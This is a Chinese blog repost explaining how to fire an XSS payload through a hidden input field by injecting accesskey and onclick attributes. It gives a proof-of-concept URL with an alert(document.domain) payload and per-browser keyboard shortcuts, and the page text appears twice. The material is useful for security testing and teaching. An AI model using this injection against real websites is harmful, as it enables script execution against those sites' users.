Hidden属性的input标签中XSS的触发方法
2017-08-18 08:57
387 查看
今天看到一个XSS漏洞,插入点在一个有
1
正常情况下的XSS应当是:
http://victim/?value=” onclick=”alert(document.domain)
但是这里由于该
1
PoC为:
http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)
触发方法不同的浏览器不同,下面是w3school的总结:
所以上面的XSS触发方法为:
FF下:shift+alt+X (测试成功)
Chrome:alt+X (最新版Chrome未测试成功)
IE下:alt+X (未测试成功)
原文链接:http://blog.csdn.net/change518/article/details/51024706
hidden属性的
input标签,大致情况如下:
<input type="hidden" name="returnurl" value="[USER INJECT]" />1
1
正常情况下的XSS应当是:
http://victim/?value=” onclick=”alert(document.domain)
但是这里由于该
input未在页面中显示,常用的
onclick方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫
accesskey于是乎构造:
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />1
1
PoC为:
http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)
触发方法不同的浏览器不同,下面是w3school的总结:
所以上面的XSS触发方法为:
FF下:shift+alt+X (测试成功)
Chrome:alt+X (最新版Chrome未测试成功)
IE下:alt+X (未测试成功)
原文链接:http://blog.csdn.net/change518/article/details/51024706
相关文章推荐
- Hidden属性的input标签中XSS的触发方法
- input标签的hidden属性的应用及作用
- Html input type text标签属性和方法事件
- input标签的hidden属性的应用及作用
- 解决input标签placeholder属性浏览器兼容性问题的一种方法
- 获取input标签的所有属性的方法
- html input type text标签属性和方法事件
- 去掉input边框的原有属性和去掉a标签样式的方法
- html input type text标签属性和方法事件
- html input type text标签属性和方法事件
- input标签的hidden属性的应用及作用
- html input type text标签属性和方法事件 (一)
- input标签的hidden属性,四大常用JSTL标签库
- jQuery的change方法什么时候触发? 你绝对意想不到,即使你通过jQuery修改了input标签的value值(即修改内存中的DOM树中的input),也不会触发change事件,不会,不会
- html标签padding--设置 btn的背景色,背景颜色方法, input的src属性
- JavaScript获取并更改input标签name属性的方法
- html input type text标签属性和方法事件
- html input type text标签属性和方法事件
- JavaScript获取并更改input标签name属性的方法
- input标签的hidden属性的应用及作用